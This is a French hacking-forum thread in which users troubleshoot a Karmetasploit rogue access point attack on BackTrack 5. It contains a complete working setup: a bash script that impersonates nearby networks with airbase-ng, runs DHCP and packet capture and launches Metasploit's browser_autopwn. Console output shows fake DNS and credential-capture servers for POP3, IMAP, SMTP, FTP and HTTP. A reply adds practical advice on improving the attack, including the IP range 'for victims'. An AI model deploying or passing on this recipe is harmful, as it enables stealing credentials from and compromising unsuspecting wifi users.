Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-02-2013 12:47:31

sharkap
N00b
Inscription : 03-02-2013
Messages : 4

Avancement dans Karmetasploit sous BT5 R3

Bonjour à tous!

Aujourd'hui je vais vous parler de Karmetasploit, qui, comme nous le savons, marche parfaitement sous BT3. Mais pose plusieurs difficultés d'installation sous BT5 R3.
Je ne l'ai testé que sous ce dernier car c'est la seule version que je possède.
Je me suis grandement inspiré du tuto disponible que ce forum et des discutions qui y sont lié et en farfouillant un peut sur le net, j'ai pu avancer dans mon projet.

Avant de commencer, je préfère vous prévenir: je rencontre quelques bug au niveau de l'installation de la rogue AP, tel que:
- Lors d'un scan wifi sous windows 7, le résultat affiche toutes les box que ma carte wifi (alfa awus036nh) est capable de détecté et ne nessecite pas de pass pour y entrer (je suppose que peut importe le choix de la box, la connection sera automatiquement dirigé vers mon moniteur).
- Problème d’exécution de db_create lors du lancement de metasploit. Les information sont sniffé mais apparemment pas enregistré.


Alors pour commencer, Framework3 n'était visiblement pas installé sous BT5 par défaut, et j'ai eu un problème de lancement de msfupdate. Alors j'ai décidé de lancer le téléchargement et l'installation manuellement grâce aux commandes:

rm -rf /opt/metasploit/msf3/
svn co http://www.metasploit.com/svn/framework3/trunk msf3
ln -s /opt/metasploit/msf3 /pentest/exploits/framework

J'ai du coller le dossier ainsi télécharger dans /opt/metasploit/
Apres ça, ma commande msfupdate marchais, et je l'ai mis à jour.

Ensuite, j'ai tenté de mettre à jour svn... Evidemment ça ne marchais pas. (Je ne sais pas trop pourquoi j'ai ue autant de problème) Alors j'ai utilité les commandes suivante:

cd /opt/metasploit/msf3/ && svn cleanup && svn up

A partir de là, ca allais mieux, j'ai pu lancer svn update et poursuivre mon installation.
Comme dhcpd n'est pas à jour pour BT5, j'ai du installer la dernière version:

aptitude install dhcp3-server

Une fois fait, j'ai copié dhcpd.conf dans /etc/dhcp3/ et dans /pentest/exploits/framework3 (c'est le raccourcis du dossier msf3).
Aperçut de dhcpd.conf:

option domain-name-servers 192.168.1.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.2 192.168.1.50;
  option routers 192.168.1.1;
  option domain-name-servers 192.168.1.1;
  default-lease-time 600;
  max-lease-time 7200;
}

Ensuite, j'ai installer karma.rc dans /pentest/exploits/framework3 :

cd /pentest/exploits/framework3
wget http://digitaloffense.net/tools/karma.rc

...Bon, c'est bien beau tout ça mais lors de l’exécution du script.sh :

#!/bin/bash


killall -9 dhcpd3 tcpdump airbase-ng

airmon-ng start wlan1
modprobe tun

airbase-ng -P -C 30 -c 11 -e Livebox-5a2e -v wlan1 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 192.168.1.1 netmask 255.255.255.0
sleep 2
echo > /var/lib/dhcp3/dhcpd.leases
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

Une erreur se produit: en effet apparemment l'écoute ne peut se faire sans l'installation de sqlite3:

Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 0 leases to leases file.

No subnet declaration for at0 (192.168.1.1).
** Ignoring requests on at0.  If this is not what
   you want, please write a subnet declaration
   in your dhcpd.conf file for the network segment
   to which interface at0 is attached. **

Bon, et bien on l'installe...

gem install activerecord sqlite3-ruby

Apparemment tout est plus ou moins prêt... on relance une fois de plus le script.sh:

Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/xx.xx.xx.xx.xx.xx/192.168.1/24
Sending on   LPF/at0/xx.xx.xx.xx.xx.xx/192.168.1/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.

**... Après ca, les modules metasploit se lancent.**
**Les xx.xx.xx.xx.xx.xx désignent mon adresse mac**

Bon encore une erreur...dhcp n'a pas les permission pour ecrire ce fameux fichier.pid. Bien que je ne sache foutrement pas a quoi il peut bien servir, j'ai quand meme trouvé les commandes sur internet pour y remédier:

touch /var/run/dhcpd.pid
chmod 777 /var/run/dhcpd.pid

Apres exécution de ces commandes, le script fonctionne mais les problèmes cité précédemment au début de mon post subsistent: db_create n'est plus pris en charge par les dernières version de Metasploit, donc je ne sais pas comment enregistrer les packets. Et ce problème de détection d'une dizaine d'AP sous windows 7 (étrangement, sur mon iphone, il ne détecte que l'ap que j'ai créer avec le nom associé)

Pour information: le script attribut correctement les ip et lors d'une connection, l'activité est affiché en ligne de commande.

Toutes les idées pour faire avancer ce projet sera le bienvenu.


Dernière information, voici ce qui se passe dans ma commande lors de l’exécution du script (je ne met qu'une partie car la liste d’exécution des modules est très longue. Il y en a plus de 50) :


/root/rogue.sh
dhcpd3: aucun processus trouvé
tcpdump: aucun processus trouvé
airbase-ng: aucun processus trouvé


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
1660    dhclient3
1661    dhclient3
1812    wpa_supplicant
23287    wpa_supplicant
23294    dhclient
Process with PID 20884 (dsniff) is running on interface wlan1
Process with PID 23287 (wpa_supplicant) is running on interface wlan1
Process with PID 1660 (dhclient3) is running on interface wlan0
Process with PID 1812 (wpa_supplicant) is running on interface wlan0


Interface    Chipset        Driver

wlan1        Ralink RT2870/3070    rt2800usb - [phy4]
                (monitor mode enabled on mon0)
wlan0        Atheros AR9285    ath9k - [phy1]

Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/xx.xx.xx.xx.xx.xx/192.168.1/24
Sending on   LPF/at0/xx.xx.xx.xx.xx.xx/192.168.1/24
Sending on   Socket/fallback/fallback-net
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1038 exploits - 577 auxiliary - 174 post
+ -- --=[ 265 payloads - 28 encoders - 8 nops

* Processing /pentest/exploits/framework3/karma.rc for ERB directives.
resource (/pentest/exploits/framework3/karma.rc)> load db_sqlite3
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: no such file to load -- /pentest/exploits/framework3/plugins/db_sqlite3
resource (/pentest/exploits/framework3/karma.rc)> db_create /root/karma.db
[-] Unknown command: db_create.
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/browser_autopwn
resource (/pentest/exploits/framework3/karma.rc)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (/pentest/exploits/framework3/karma.rc)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (/pentest/exploits/framework3/karma.rc)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (/pentest/exploits/framework3/karma.rc)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (/pentest/exploits/framework3/karma.rc)> set LPORT 45000
LPORT => 45000
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 55550
SRVPORT => 55550
resource (/pentest/exploits/framework3/karma.rc)> set URIPATH /ads
URIPATH => /ads
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/pop3
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 110
SRVPORT => 110
resource (/pentest/exploits/framework3/karma.rc)> set SSL false
SSL => false
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/pop3
* Setup
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 995
SRVPORT => 995
resource (/pentest/exploits/framework3/karma.rc)> set SSL true
SSL => true
resource (/pentest/exploits/framework3/karma.rc)> run
* Obfuscating initial javascript 2013-02-03 15:32:43 +0400
* Listening on 0.0.0.0:110...
* Server started.
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/ftp
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/imap
resource (/pentest/exploits/framework3/karma.rc)> set SSL false
SSL => false
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 143
SRVPORT => 143
resource (/pentest/exploits/framework3/karma.rc)> run
* Listening on 0.0.0.0:995...
* Listening on 0.0.0.0:21...
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/imap
resource (/pentest/exploits/framework3/karma.rc)> set SSL true
* Listening on 0.0.0.0:143...
* Server started.
SSL => true
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 993
SRVPORT => 993
resource (/pentest/exploits/framework3/karma.rc)> run
* Server started.
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/smtp
resource (/pentest/exploits/framework3/karma.rc)> set SSL false
SSL => false
* Listening on 0.0.0.0:993...
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 25
SRVPORT => 25
resource (/pentest/exploits/framework3/karma.rc)> run
* Server started.
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/smtp
resource (/pentest/exploits/framework3/karma.rc)> set SSL true
SSL => true
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 465
SRVPORT => 465
* Listening on 0.0.0.0:25...
* Server started.
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/fakedns
resource (/pentest/exploits/framework3/karma.rc)> unset TARGETHOST
Unsetting TARGETHOST...
* Server started.
* Listening on 0.0.0.0:465...
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 5353
SRVPORT => 5353
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/fakedns
resource (/pentest/exploits/framework3/karma.rc)> unset TARGETHOST
Unsetting TARGETHOST...
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 53
* Server started.
SRVPORT => 53
resource (/pentest/exploits/framework3/karma.rc)> run
* DNS server initializing
* DNS server started
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/http
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 80
* DNS server initializing
* DNS server started
SRVPORT => 80
resource (/pentest/exploits/framework3/karma.rc)> set SSL false
SSL => false
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/http
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 8080
SRVPORT => 8080
resource (/pentest/exploits/framework3/karma.rc)> set SSL false
SSL => false
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/http
* Listening on 0.0.0.0:80...
* Server started.
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 443
SRVPORT => 443
resource (/pentest/exploits/framework3/karma.rc)> set SSL true
SSL => true
resource (/pentest/exploits/framework3/karma.rc)> run
* Listening on 0.0.0.0:8080...
* Server started.
* Auxiliary module execution completed
resource (/pentest/exploits/framework3/karma.rc)> use auxiliary/server/capture/http
* 192.168.1.1:58233 - DNS - DNS target domain found: kwujtnrqfg.home
* 192.168.1.1:58233 - DNS - DNS target domain kwujtnrqfg.home faked
* 192.168.1.1:58233 - DNS - XID 3812 (IN::A kwujtnrqfg.home)
resource (/pentest/exploits/framework3/karma.rc)> set SRVPORT 8443
* Listening on 0.0.0.0:443...
* 192.168.1.1:37950 - DNS - DNS target domain found: ydholpmcve.home
* 192.168.1.1:37950 - DNS - DNS target domain ydholpmcve.home faked
* 192.168.1.1:37950 - DNS - XID 40222 (IN::A ydholpmcve.home)
* HTTP REQUEST 192.168.1.1 > kwujtnrqfg:80 HEAD / Linux   cookies=
SRVPORT => 8443
resource (/pentest/exploits/framework3/karma.rc)> set SSL true
SSL => true
resource (/pentest/exploits/framework3/karma.rc)> run
* Auxiliary module execution completed
* 192.168.1.1:60695 - DNS - DNS target domain found: vxxjqsrwan.home
* 192.168.1.1:60695 - DNS - DNS target domain vxxjqsrwan.home faked
* 192.168.1.1:60695 - DNS - XID 49421 (IN::A vxxjqsrwan.home)
* HTTP REQUEST 192.168.1.1 > ydholpmcve:80 HEAD / Linux   cookies=
.....

La mise en place complète de l'ap prend environ 5min.

Dernière modification par sharkap (03-02-2013 16:04:39)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-02-2013 23:05:13

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Avancement dans Karmetasploit sous BT5 R3

Oulààà, je me dois de corriger quelques contre-vérités ici. Bon, d'abord, bienvenue sur le forum smile

Ensuite, dans l'ordre :

- Lors d'un scan wifi sous windows 7, le résultat affiche toutes les box que ma carte wifi (alfa awus036nh) est capable de détecté et ne nessecite pas de pass pour y entrer (je suppose que peut importe le choix de la box, la connection sera automatiquement dirigé vers mon moniteur).

Ca dépend de la commande airbase-ng qui est utilisée, mais l'option -P permet de répondre à tous les probes, c'est-à-dire de prendre le nom de tous les réseaux recherchés. Dès qu'un client cherche le réseau "Cool_un_wifi_gratuit", ton rogue-AP répondra en disant que c'est lui.

- Problème d’exécution de db_create lors du lancement de metasploit. Les information sont sniffé mais apparemment pas enregistré.

Exact, Metasploit a beaucoup changé depuis BT3 et cette commande n'existe plus. Si je me souviens bien, elle a été remplacée par db_connect (qui crée la base si nécessaire), mais même cette commande serait inutile sur BT5
--> Pas de db_create

Alors pour commencer, Framework3 n'était visiblement pas installé sous BT5 par défaut, et j'ai eu un problème de lancement de msfupdate. Alors j'ai décidé de lancer le téléchargement et l'installation manuellement grâce aux commandes:

rm -rf /opt/metasploit/msf3/
svn co http://www.metasploit.com/svn/framework3/trunk msf3
ln -s /opt/metasploit/msf3 /pentest/exploits/framework

Objection ! Metasploit est bien présent, et dans le dossier que tu supprimes si violemment. Simplement, les exécutables ne sont pas dans le $PATH donc on doit les appeler avec un chemin complet. Dans ton cas : /opt/metasploit/msf3/msfupdate
Bon, ce que tu fais fonctionne aussi, mais en arrachant ainsi la version intégrée à BackTrack tu risques de perdre les petites optimisations qui font justement que ça fonctionne pas (trop) mal out-of-the-box. Note que "msfupate" ne semble être qu'un appel au SVN donc tu peux le faire directement aussi.

A partir de là, ca allais mieux, j'ai pu lancer svn update et poursuivre mon installation.
Comme dhcpd n'est pas à jour pour BT5, j'ai du installer la dernière version:

C'est pas qu'il est pas à jour, c'est qu'il est carrément absent roll Il faut effectivement l'installer, même si on peut le remplacer par un équivalent plus simple/léger --> Can't open DHCPD.CONF : permission denied ! Chmod:done !
Ton dhcp.conf a l'air correct, juste une remarque : n'utilise pas la plage "192.168.1.*" pour tes victimes, elle risque d'entrer en conflit avec ta connexion a toi (celle sur laquelle tu rediriges les victimes) et de compliquer le routage. Keep it simple, prends un truc peu courant genre 192.168.42.*

Ensuite, j'ai installer karma.rc dans /pentest/exploits/framework3 :

Il y a une version plus récente et mieux adaptée, voir mon second point plus bas.

Une erreur se produit: en effet apparemment l'écoute ne peut se faire sans l'installation de sqlite3:

Là t'as du te louper dans le copier-coller parce que le message d'erreur ne parle pas du tout de sqlite3 big_smile

Bon encore une erreur...dhcp n'a pas les permission pour ecrire ce fameux fichier.pid. Bien que je ne sache foutrement pas a quoi il peut bien servir, j'ai quand meme trouvé les commandes sur internet pour y remédier:

Les fichiers .PID sont utilisés par les daemons (tâches d'arrière-plan) pour montrer qu'ils sont actifs et indiquer leur état. Même si leur présence n'est pas strictement obligatoire, ça fait plus propre de les avoir (et certains programmes deviennent grincheux si on ne les laisse pas créer leur .PID).

Voilà pour les remarques, qui ne sont pas des reproches (puisque tu as résolu tout seul quasiment tous les problèmes, bravo smile), c'est juste pour que le suivant puisse gagner du temps (ne pas réinstaller Metasploit, par exemple tongue)

En ce qui concerne Karmetasploit lui-même, comme je l'ai indiqué ailleurs sur le forum, il existe une version plus récente (adaptée à BT5) et des instructions plus adaptées pour le faire fonctionner.
Plus d'infos ici --> Script Karmetasploit pour une attaque rogue AP très facile à effectuer
Et les instructions en anglais directement --> Karmetasploit- Backtrack 5 Tutorial

Pour les deux "problèmes" que tu mentionnes, j'y ai répondu plus haut : vire l'option "-P" d'airbase-ng dans ton script, et contourne la commande db_create qui n'est plus nécessaire wink

Hors Ligne

#3 05-02-2013 13:37:29

sharkap
N00b
Inscription : 03-02-2013
Messages : 4

Re : Avancement dans Karmetasploit sous BT5 R3

Bonjour Antares.
Merci pour toute les précisions que tu m'a apporté, je suis pressé de savoir si elles vont résoudre mes problèmes !

Par contre j'ai encore une question avant de tester de nouveau la rogue AP :

Tu m'a parlé d'un nouveau fichier karma.rc mais je ne sais pas du tout ou le trouver ni quel différence il y a entre les 2 versions. Si tu pouvais m'en dire un peu plus stp.


Au sujet de sqlite3 je ne me suis pas trompé dans le copier collé. Je ne sais pas quel rapport il y a entre l'écoute et ce module mais sans lui je n'ai pas pu lancer l'ap! Et si j'ai su comment pallié l'erreur qui précédait son installation c'est justement parce que j'avais déjà vu le nouveau tuto adapté pour BT5 et que je m'en suis inspiré.
Mais de toute façon, j'avais beaucoup trop d'erreur que je ne pouvais corriger par moi seul, même en fouillant tout le net pour poursuivre ce tuto jusqu'au bout.


Merci encore pour ton aide

Dernière modification par sharkap (05-02-2013 13:42:23)

Hors Ligne

#4 07-02-2013 23:38:43

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Avancement dans Karmetasploit sous BT5 R3

sharkap a écrit :

Tu m'a parlé d'un nouveau fichier karma.rc mais je ne sais pas du tout ou le trouver ni quel différence il y a entre les 2 versions. Si tu pouvais m'en dire un peu plus stp.

Le lien est sur le site que j'indique en lien, mais j'ai parlé trop vite, le fichier n'est plus disponible (à cet emplacement en tout cas). Je conch*e ces gens qui mettent des fichiers en ligne puis qui les virent dès qu'ils changent un peu leur site web roll
A l'occasion je chercherai s'il existe ailleurs, mais d'ici-là il faudra faire avec le "vieux" fichier, qui ne fonctionne pas trop mal vu test tests (chance !). Si ça se trouve, le fichier était le même, tout ce que je trouve pour l'instant n'a pas bougé depuis 3 ans...

Pour le message d'erreur, je sais pas comment t'as deviné que ça venait de sqlite, mais bien joué big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]